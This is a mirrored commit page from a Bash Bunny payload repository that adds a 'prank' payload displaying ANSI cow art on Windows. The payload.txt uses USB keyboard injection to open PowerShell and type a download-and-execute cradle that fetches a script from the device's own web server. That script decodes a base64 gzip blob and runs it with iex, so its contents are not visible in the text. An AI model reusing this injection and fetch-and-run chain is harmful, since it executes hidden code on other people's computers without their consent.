hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

New Payload - ANSI Sebs cow (#460) 

* New Payload - ANSI Sebs cow

* Update Cow

* Making the cow symmetrical
pull/464/head
cribb-it 2021-08-24 20:31:02 +01:00 committed by GitHub
parent 605b7f1cab
commit 3fb08e01ae
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 121 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
payloads/library/prank/Win_PoSH_AnsiSebsCow/moo Normal file
View File

@ -0,0 +1,60 @@
# Ansi art base64 encoded gzip file
$data = 'H4sIAAAAAAAEAO3aTUrDQBQH8L3gHdLiNYSCgkdw3UVBF1aoBa+QpU2MBUHwLB6lJ9EWC8nMm3kf838tUsmsTOe9/y+TrxYvltVlNRmfn23empMaSPFqNzxiIivjxVg3vqaXGBIQXtBZXJgRW+1QYnNMYCmZuP363G8FCQ0h7XX6
iVvFyrYD7XZ2rY+3CjPEx4+ZSo16WKclYTlbs58UC+vIGYSqKQwNrLOi32aUheYwoqY3m3Yl/yDmsFX6GdRXF00JNP3mmvyS2UHbfEbRPbFNSHrnmlmRqhN3ZYNK7+9x4bafoBATgnaDbMln1T2xCEspJI1SKCyW7cgEUeZO79Il
Uhog8dlpbgJgeGa6Q36yd9Sev0o0s/wNqRxph+QzbgbRCQEnyBAogSyX5nYMSi9rht0wR135LE48XokhXcnESzTEw6nkGomMbO4Jy13GwftWnlRzvEx7Z11OTb2GZYiDD7AqT60FvDPbFtUo5bGH9Kou0L/q1YvN5zFUqwDbHnVI
lMZlezTbNnT2YFlKD6x2UQ3LotY1/jS+gyKu5WfxY+p0WTE/O2BpOaCr7lA0EPBfdxwaAlj4NNvv9pDxXXErxydRToEXhIoBrbJ1yitI6wC+IcrDokZRHl6sLN+9broX6Fhj0Tpxw1ftVtfTxWI2r27v50/V8m5WXT0+VzfTh9lo
9LNT0CfuWXaGakb3jl6vD2zCU/zXs/HkGzPXN594JwAA'
## Decompress the ansi art
$binaryData = [System.Convert]::FromBase64String($data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($binaryData, 0, $binaryData.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]"Decompress")
$sr = New-Object System.IO.StreamReader($cs)
$structure = $sr.ReadToEnd()
iex $structure
Clear-Host
# Resize window
1..4 | % {
try
{
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 80,47
}
catch {}
}
# Loop each char
$t | % {$_[0..($_.length)]} | % {
# Set colour
switch ($_) {
"▒" {
$c = "Green"
$b = "Green"
}
"░" {
$c = "DarkYellow"
$b = "Yellow"
}
"▓" {
# to get pink
$c = "Red"
$b = "White"
}
"█" {
$c = "Black"
$b = "Black"
}
" " {
$c = "White"
$b = "White"
}
default {
$c = "White"
$b = "DarkBlue"
}
}
# Write char
Write-Host $_ -NoNewline -ForegroundColor $c -backgroundcolor $b
}

38
payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt Normal file
View File

@ -0,0 +1,38 @@
#!/bin/bash
# Title: ANSI Seb's Cow
# Description: Display an ANSI art Seb's Cow
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (compression)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN Powershell
QUACK DELAY 500
QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/moo\")"
QUACK ENTER
LED FINISH

23
payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md Normal file
View File

@ -0,0 +1,23 @@
# ANSI Seb's Cow
- Author: Cribbit
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (Compression)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Shows an ansi art image of seb's cow in a powershell window
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |